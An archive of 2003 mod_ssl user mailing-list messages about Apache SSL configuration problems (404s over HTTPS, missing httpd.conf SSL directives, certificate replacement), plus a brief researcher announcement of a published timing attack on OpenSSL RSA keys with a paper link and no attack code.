To: modssl-users@modssl.org
Subject: Re: private key not found
Date: Fri, 14 Mar 2003 15:25:13 -0600
User-Agent: KMail/1.4.3
References: <20030313175558.E871039F9@xmxpita.myway.com>
In-Reply-To: <20030313175558.E871039F9@xmxpita.myway.com>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200303141525.14074.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Right then. I moved my certificates into their respective directories and=
=20
re-reeditted my httpd.conf file to reflect those changes and set the=20
SSLVerifyClient to 'none'. I was not sure where to go to change the loggi=
ng=20
to 'trace' though. But, I can get into the secure server now so it=20
technically works. (thank you again Camun, and DuFresne and Stromas too)=20

However, I am finding that all of the pages I've visited while in https a=
re=20
pulling up 404 errors. The same pages pull up fine in http. Do I need to =
have=20
a mirrored web directory just for https to get the files to show up or=20
something? This is the only real conclusion I can think of.

On Thursday 13 March 2003 11:55, cam wrote:
>  --- On Fri 03/14, A. Putnam < aputnam@pelathe.org > wrote:
> >I get this error moeesage:
> >
> >"www.pelathe.org has received an incorrect or unexpected message. Erro=
r
> > Code: -12227" I've never seen an error code like that before. Does an=
yone
> > know what it means?
>
> Again, a guess, but you haven't set SSLVerifyClient Require have you? Y=
ou
> (presumably, otherwise, get reading on client certificates) want 'none'
> here. If not, in fact, in any case, have a look in your SSL log files (=
not
> the 'normal' log files) which will have been specified in httpd.conf...=
 The
> logs are your friend.
>
> cam
>
> _______________________________________________
> No banners. No pop-ups. No kidding.
> Introducing My Way - http://www.myway.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 13 20:36:11 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AC7132AA02A; Thu, 13 Mar 2003 20:36:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gavia.izoard.com (mail.izoard.com [64.3.36.44])
	by master.modssl.org (Postfix) with ESMTP id BA83A2AA01F
	for ; Thu, 13 Mar 2003 20:36:09 +0100 (CET)
Received: from mortirolo.izoard.com ([192.168.0.50] helo=izoard.com)
	by gavia.izoard.com with smtp (Exim 3.35 #1 (Debian))
	id 18tYUo-0006bh-00; Thu, 13 Mar 2003 14:36:06 -0500
Received: from 199.196.144.12
        (SquirrelMail authenticated user ams)
        by www.izoard.com with HTTP;
        Thu, 13 Mar 2003 14:36:06 -0500 (EST)
Message-ID: <53472.199.196.144.12.1047584166.squirrel@www.izoard.com>
Date: Thu, 13 Mar 2003 14:36:06 -0500 (EST)
Subject: Re: private key not found
From: "Aaron Stromas" 
To: 
In-Reply-To: <200303141525.14074.aputnam@pelathe.org>
References: <200303141525.14074.aputnam@pelathe.org>
Cc: 
X-Mailer: SquirrelMail (version 1.2.0 [rc2])
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aaron Stromas" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

A. Putnam said:
> Right then. I moved my certificates into their respective directories
> and  re-reeditted my httpd.conf file to reflect those changes and set
> the  SSLVerifyClient to 'none'. I was not sure where to go to change
> the logging  to 'trace' though. But, I can get into the secure server
> now so it  technically works. (thank you again Camun, and DuFresne and
> Stromas too)

SSLLogLevel trace

>
> However, I am finding that all of the pages I've visited while in https
> are  pulling up 404 errors. The same pages pull up fine in http. Do I
> need to have  a mirrored web directory just for https to get the files
> to show up or  something? This is the only real conclusion I can think
> of.

What does the access log say?

If you still can't figure it out looking at logs you should post your
httpd.conf>
> On Thursday 13 March 2003 11:55, cam wrote:
>>  --- On Fri 03/14, A. Putnam < aputnam@pelathe.org > wrote:
>> >I get this error moeesage:
>> >
>> >"www.pelathe.org has received an incorrect or unexpected message.
>> >Error
>> > Code: -12227" I've never seen an error code like that before. Does
>> > anyone know what it means?
>>
>> Again, a guess, but you haven't set SSLVerifyClient Require have you?
>> You (presumably, otherwise, get reading on client certificates) want
>> 'none' here. If not, in fact, in any case, have a look in your SSL log
>> files (not the 'normal' log files) which will have been specified in
>> httpd.conf... The logs are your friend.
>>
>> cam
>>
>> _______________________________________________
>> No banners. No pop-ups. No kidding.
>> Introducing My Way - http://www.myway.com
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>
> --
> A. Putnam
> Assistant IT Administrator
> Pelathe Community Resource Center
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


-- 
Aaron Stromas         | "Tik-tik-tik!!!... ja, Pantani is weg..."
ams@izoard.com        | BRTN commentator
+1 (301) 493 4933     | L'Alpe d'Huez
http://www.izoard.com | 1995 Tour de France



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 01:07:06 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 416282AA02C; Fri, 14 Mar 2003 01:07:06 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.Stanford.EDU (smtp1.Stanford.EDU [171.64.14.23])
	by master.modssl.org (Postfix) with ESMTP id 98D0A2AA028
	for ; Fri, 14 Mar 2003 01:07:04 +0100 (CET)
Received: from smtp1.Stanford.EDU ([127.0.0.1])
	by smtp1.Stanford.EDU (8.12.6/8.12.6) with ESMTP id h2E070HI002008
	for ; Thu, 13 Mar 2003 16:07:00 -0800 (PST)
Received: from djblaptop.Stanford.EDU (djblaptop.Stanford.EDU [171.64.70.12])
	by smtp1.Stanford.EDU (8.12.6/8.12.6) with ESMTP id h2E06wDS001991
	for ; Thu, 13 Mar 2003 16:06:59 -0800 (PST)
Subject: Timing attack against OpenSSL/mod_SSL
From: David Brumley 
To: modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 (1.0.8-10) 
Date: 13 Mar 2003 16:08:32 -0800
Message-Id: <1047600513.5180.65.camel@djblaptop.stanford.edu>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Brumley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Dan Boneh and I have been researching timing attacks against software
crypto libraries.  Timing attacks are usually used to attack weak
computing devices such as smartcards.  We've successfully developed and
mounted timing attacks against software crypto libraries running on
general purpose PC's.  

We found that we can recover an RSA secret from OpenSSL using anywhere
from only 300,000 to 1.4 million queries.  We demonstrated our attack
was pratical by successfully launching an attack against Apache +
mod_SSL and stunnel on the local network.  Our results show that timing
attacks are practical against widely-deploy servers running on the
network. 

While OpenSSL definitely does provide for blinding, mod_SSL doesn't
appear to use it. One reason is it appears difficult to enable blinding
from the SSL API.  

This paper was submitted to Usenix security 03.  The link to the paper
is here:
http://crypto.stanford.edu/~dabo/abstracts/ssl-timing.html

We notified CERT about a month ago re: this attack, so it's possible you
heard about this from them already.

flames > /dev/null.  Feel free to write with any questions.

Cheers,
-David Brumley

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 16:46:05 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C56532AA02A; Fri, 14 Mar 2003 16:46:05 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.triangleinternet.biz (triangleinternet.biz [166.82.179.39])
	by master.modssl.org (Postfix) with SMTP id 87E922AA015
	for ; Fri, 14 Mar 2003 16:46:03 +0100 (CET)
Received: (qmail 16197 invoked from network); 14 Mar 2003 15:53:01 -0000
Received: from rdu74-155-105.nc.rr.com (HELO wakeinternet.com) (24.74.155.105)
  by mail.triangleinternet.biz with SMTP; 14 Mar 2003 15:53:01 -0000
Message-ID: <3E71F920.5000008@wakeinternet.com>
Date: Fri, 14 Mar 2003 10:45:36 -0500
From: Rick Root 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Installation Woes
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rick Root 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi folks.. I'm a newbie here, installing Apache and OpenSSL and mod_ssl 
from source on my RedHat 7.3 (I uninstalled the RPMS)

Call me stupid, but I must be missing something...

The installation instructions are pretty straightforward but I have one 
major problem - the httpd.conf doesn't include ANY ssl configuration 
options after it's installed.

So of course, SSL doesn't work.

The instructions seem to assume that the SSL configuration options will 
be there.  This left me really confused.

I ripped out some code from another httpd.conf but now I've got it 
responding to SSL on port 80 as well as 443.

What I'm looking for is BASIC instructions on how to configure apache to 
use SSL (and maybe someone can tell me why it's not IN the instructions 
in the first place).  I've looked in the FAQ and the reference guide but 
I haven't had any luck yet.

Downloaded everything today - apache 1.3.27, open_ssl 0.9.7a, and 
mod_ssl 2.8.12


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 17:03:28 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9FDF52AA02A; Fri, 14 Mar 2003 17:03:27 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relay2.bt.net (relay2.bt.net [194.72.6.62])
	by master.modssl.org (Postfix) with ESMTP id 700AE2AA015
	for ; Fri, 14 Mar 2003 17:03:25 +0100 (CET)
Received: from whmr18.ing-barings.com ([194.128.222.11])
	by relay2.bt.net with esmtp (Exim 3.22 #1)
	id 18treT-0002xl-00
	for modssl-users@modssl.org; Fri, 14 Mar 2003 16:03:21 +0000
Received: from ldnxch05.nt.eur.barings.ing (unverified) by WHMR18.ing-barings.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id  for ;
 Fri, 14 Mar 2003 15:59:00 +0000
Received: from ldnxch02.eur.barings.ing (unverified) by 
    ldnxch05.nt.eur.barings.ing (Content Technologies SMTPRS 4.3.1) with 
    ESMTP id  for 
    ; Fri, 14 Mar 2003 15:52:06 +0000
Received: by LDNXCH02 with Internet Mail Service (5.5.2653.19) id ; 
    Fri, 14 Mar 2003 15:52:08 -0000
Message-ID: <11328F863DFEB3459BC88430382EB6B735B403@LDNXCH07>
From: Martin.Evans@UK.ING.COM
To: modssl-users@modssl.org
Subject: RE: Installation Woes
Date: Fri, 14 Mar 2003 15:52:04 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain; charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Martin.Evans@UK.ING.COM
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Rick,

been fighting with it myself today, I'm using Solaris but if you run httpd
-l it will tell you what modules were compiled into your build, if mod_ssl
isn't there you'll either have to rebuild with mod_ssl or load the module
dynamically. 

-----Original Message-----
From: Rick Root [mailto:rroot@wakeinternet.com]
Sent: Friday, March 14, 2003 3:46 PM
To: modssl-users@modssl.org
Subject: Installation Woes


Hi folks.. I'm a newbie here, installing Apache and OpenSSL and mod_ssl 
from source on my RedHat 7.3 (I uninstalled the RPMS)

Call me stupid, but I must be missing something...

The installation instructions are pretty straightforward but I have one 
major problem - the httpd.conf doesn't include ANY ssl configuration 
options after it's installed.

So of course, SSL doesn't work.

The instructions seem to assume that the SSL configuration options will 
be there.  This left me really confused.

I ripped out some code from another httpd.conf but now I've got it 
responding to SSL on port 80 as well as 443.

What I'm looking for is BASIC instructions on how to configure apache to 
use SSL (and maybe someone can tell me why it's not IN the instructions 
in the first place).  I've looked in the FAQ and the reference guide but 
I haven't had any luck yet.

Downloaded everything today - apache 1.3.27, open_ssl 0.9.7a, and 
mod_ssl 2.8.12


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


------------------------------------------------------------------------------
The information in this Internet email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this Internet email by anyone else is unauthorised.
If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this Internet email are subject to the terms and conditions expressed in any applicable governing ING terms of business or client engagement letter.
Visit us at www.ing.com
------------------------------------------------------------------------------
01

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 17:49:28 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 473A72AA02A; Fri, 14 Mar 2003 17:49:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xmxpita.myway.com (nn1.excitenetwork.com [207.159.120.55])
	by master.modssl.org (Postfix) with ESMTP id B27812AA015
	for ; Fri, 14 Mar 2003 17:49:26 +0100 (CET)
Received: by xmxpita.myway.com (Postfix, from userid 110)
	id CB61E39E7; Fri, 14 Mar 2003 11:49:20 -0500 (EST)
To: modssl-users@modssl.org
Subject: RE: Installation Woes
Received: from [194.201.150.100] by mprdmailfe3.nwk.myway.com via HTTP; Fri, 14 Mar 2003 11:49:20 EST
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: ID = 427ca1860f709c6c72e7c11ebe29e70d
From: "cam" 
MIME-Version: 1.0
X-Sender: camun2020@myway.com
X-Mailer: PHP
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Cc: 
Message-Id: <20030314164920.CB61E39E7@xmxpita.myway.com>
Date: Fri, 14 Mar 2003 11:49:20 -0500 (EST)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "cam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Have you tried this?

http://www.tldp.org/HOWTO/Apache-Compile-HOWTO/

cam

_______________________________________________
No banners. No pop-ups. No kidding.
Introducing My Way - http://www.myway.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 17:51:43 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0B1872AA02C; Fri, 14 Mar 2003 17:51:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gwdom2-med.med.utah.edu (smtp.med.utah.edu [155.100.100.43])
	by master.modssl.org (Postfix) with ESMTP id 22E3A2AA028
	for ; Fri, 14 Mar 2003 17:51:41 +0100 (CET)
Received: from GWY-MTA by gwdom2-med.med.utah.edu
	with Novell_GroupWise; Fri, 14 Mar 2003 09:51:03 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.3 Beta
Date: Fri, 14 Mar 2003 09:50:56 -0700
From: "Evan Dillon" 
To: , 
Subject: Re: Installation Woes
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary="=_4B140A67.C7A6FBD3"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Evan Dillon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--=_4B140A67.C7A6FBD3
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: quoted-printable

try the apache/mod_ssl part of this:
=20
http://www.devshed.com/Server_Side/PHP/SoothinglySeamless/page1.html

>>> rroot@wakeinternet.com 03/14/03 08:45AM >>>
Hi folks.. I'm a newbie here, installing Apache and OpenSSL and mod_ssl=20
from source on my RedHat 7.3 (I uninstalled the RPMS)

Call me stupid, but I must be missing something...

The installation instructions are pretty straightforward but I have one=20
major problem - the httpd.conf doesn't include ANY ssl configuration=20
options after it's installed.

So of course, SSL doesn't work.

The instructions seem to assume that the SSL configuration options will=20
be there.  This left me really confused.

I ripped out some code from another httpd.conf but now I've got it=20
responding to SSL on port 80 as well as 443.

What I'm looking for is BASIC instructions on how to configure apache =
to=20
use SSL (and maybe someone can tell me why it's not IN the instructions=20
in the first place).  I've looked in the FAQ and the reference guide =
but=20
I haven't had any luck yet.

Downloaded everything today - apache 1.3.27, open_ssl 0.9.7a, and=20
mod_ssl 2.8.12


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org=20
User Support Mailing List                      modssl-users@modssl.org=20
Automated List Manager                            majordomo@modssl.org=20



--=_4B140A67.C7A6FBD3
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable







try the apache/mod_ssl part of this:


 


http://www.devshed.com/Server_Side/PHP/SoothinglySeamless/page1.html=


>>>=20
rroot@wakeinternet.com 03/14/03 08:45AM >>>
Hi folks.. I'm a =
newbie=20
here, installing Apache and OpenSSL and mod_ssl 
from source on my =
RedHat 7.3=20
(I uninstalled the RPMS)

Call me stupid, but I must be missing=20
something...

The installation instructions are pretty straightforwar=
d but=20
I have one 
major problem - the httpd.conf doesn't include ANY ssl=20
configuration 
options after it's installed.

So of course, SSL =
doesn't=20
work.

The instructions seem to assume that the SSL configuration =
options=20
will 
be there.  This left me really confused.

I ripped out =
some=20
code from another httpd.conf but now I've got it 
responding to SSL on =
port=20
80 as well as 443.

What I'm looking for is BASIC instructions on =
how to=20
configure apache to 
use SSL (and maybe someone can tell me why it's =
not IN=20
the instructions 
in the first place).  I've looked in the FAQ and =
the=20
reference guide but 
I haven't had any luck yet.

Downloaded =
everything=20
today - apache 1.3.27, open_ssl 0.9.7a, and 
mod_ssl=20
2.8.12


_________________________________________________________=
_____________
Apache=20
Interface to OpenSSL=20
(mod_ssl)           =
       =20
www.modssl.org
User Support =
Mailing=20
List            =
;         =20
modssl-users@modssl.org
Automated List=20
Manager           &n=
bsp;            =
;   =20
majordomo@modssl.org


--=_4B140A67.C7A6FBD3--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 18:17:32 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7587F2AA02A; Fri, 14 Mar 2003 18:17:32 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.triangleinternet.biz (triangleinternet.biz [166.82.179.39])
	by master.modssl.org (Postfix) with SMTP id 5DB0A2AA015
	for ; Fri, 14 Mar 2003 18:17:28 +0100 (CET)
Received: (qmail 17978 invoked from network); 14 Mar 2003 17:24:25 -0000
Received: from rdu74-155-105.nc.rr.com (HELO wakeinternet.com) (24.74.155.105)
  by mail.triangleinternet.biz with SMTP; 14 Mar 2003 17:24:25 -0000
Message-ID: <3E720E8B.6020107@wakeinternet.com>
Date: Fri, 14 Mar 2003 12:16:59 -0500
From: Rick Root 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Installation Woes
References: 
In-Reply-To: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rick Root 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Evan Dillon wrote:
> try the apache/mod_ssl part of this:
>  
> http://www.devshed.com/Server_Side/PHP/SoothinglySeamless/page1.html

Evan,

That looks great... but... it doesn't tell me how to configure
SSL in the httpd.conf.  SSL is nowhere to be found in my httpd.conf, the 
default one that came with my apache 1.3.27 source distribution.

cam wrote:
 > Have you tried this?
 >
 > http://www.tldp.org/HOWTO/Apache-Compile-HOWTO/

Cam,

I don't have any problem compiling apache with mod_ssl.  I don't know 
how to configure it in the httpd.conf because after installation, SSL is 
nowhere to be mentioned in the httpd.conf that is installed.

Thanks.

  Rick Root

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 18:43:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 22CC12AA02A; Fri, 14 Mar 2003 18:43:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sccrmhc03.attbi.com (sccrmhc03.attbi.com [204.127.202.63])
	by master.modssl.org (Postfix) with ESMTP id A1B3F2AA015
	for ; Fri, 14 Mar 2003 18:43:56 +0100 (CET)
Received: from resin (12-231-187-64.client.attbi.com[12.231.187.64])
          by sccrmhc03.attbi.com (sccrmhc03) with SMTP
          id <20030314174352003001gmvle>; Fri, 14 Mar 2003 17:43:52 +0000
Message-ID: <003401c2ea51$39025560$6f00000a@resin>
From: 
To: 
Subject: Replacing the default HTTPS cert??
Date: Fri, 14 Mar 2003 09:43:28 -0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0031_01C2EA0E.2A9BF1E0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0031_01C2EA0E.2A9BF1E0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

How can I replace the default HTTPS cert with my own? I installed =
apache13_modssl from ports, freebsd 5.0.


-l0ngb0ng
------=_NextPart_000_0031_01C2EA0E.2A9BF1E0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









How can I replace the default HTTPS =
cert with my=20
own? I installed apache13_modssl from ports, freebsd 5.0.


 


 


-l0ngb0ng


------=_NextPart_000_0031_01C2EA0E.2A9BF1E0--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 19:06:24 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4A3162AA02A; Fri, 14 Mar 2003 19:06:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 70EA32AA015
	for ; Fri, 14 Mar 2003 19:06:21 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id NAA13025;
	Fri, 14 Mar 2003 13:04:40 -0500
Date: Fri, 14 Mar 2003 13:04:39 -0500 (EST)
From: "R. DuFresne" 
To: Rick Root 
Cc: modssl-users@modssl.org
Subject: Re: Installation Woes
In-Reply-To: <3E720E8B.6020107@wakeinternet.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, 14 Mar 2003, Rick Root wrote:

> Evan Dillon wrote:
> > try the apache/mod_ssl part of this:
> >  
> > http://www.devshed.com/Server_Side/PHP/SoothinglySeamless/page1.html
> 
> Evan,
> 
> That looks great... but... it doesn't tell me how to configure
> SSL in the httpd.conf.  SSL is nowhere to be found in my httpd.conf, the 
> default one that came with my apache 1.3.27 source distribution.

which means that you have not  configured mod-ssl and openssl properly
into your apache setup.  Once properly done the default config will
reflect the changes you seek.


Thanks,


Ron DuFresne

> 
> cam wrote:
>  > Have you tried this?
>  >
>  > http://www.tldp.org/HOWTO/Apache-Compile-HOWTO/
> 
> Cam,
> 
> I don't have any problem compiling apache with mod_ssl.  I don't know 
> how to configure it in the httpd.conf because after installation, SSL is 
> nowhere to be mentioned in the httpd.conf that is installed.
> 
> Thanks.
> 
>   Rick Root
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 19:42:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0A4422AA02A; Fri, 14 Mar 2003 19:42:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id 1B0752AA015
	for ; Fri, 14 Mar 2003 19:42:38 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id 83BD380E1D
	for ; Sat, 15 Mar 2003 15:07:35 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: Re: private key not found
Date: Sat, 15 Mar 2003 15:07:34 -0600
User-Agent: KMail/1.4.3
References: <200303141525.14074.aputnam@pelathe.org> <53472.199.196.144.12.1047584166.squirrel@www.izoard.com>
In-Reply-To: <53472.199.196.144.12.1047584166.squirrel@www.izoard.com>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200303151507.34976.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I found the SSLLogLevel, thanks. Here is the engine log from today. I'm n=
ot=20
really sure what to make of it...

[15/Mar/2003 14:30:18 11313] [info]  Server: Apache/1.3.26, Interface:=20
mod_ssl/2.8.10, Library: OpenSSL/0.9.6g
[15/Mar/2003 14:30:18 11313] [info]  Init: 1st startup round (still not=20
detached)
[15/Mar/2003 14:30:18 11313] [info]  Init: Initializing OpenSSL library
[15/Mar/2003 14:30:18 11313] [info]  Init: Loading certificate & private =
key=20
of SSL-aware server matrix.pelathe.org:443
[15/Mar/2003 14:30:18 11313] [info]  Init: Seeding PRNG with 136 bytes of=
=20
entropy
[15/Mar/2003 14:30:18 11313] [info]  Init: Generating temporary RSA priva=
te=20
keys (512/1024 bits)
[15/Mar/2003 14:30:18 11313] [info]  Init: Configuring temporary DH param=
eters=20
(512/1024 bits)
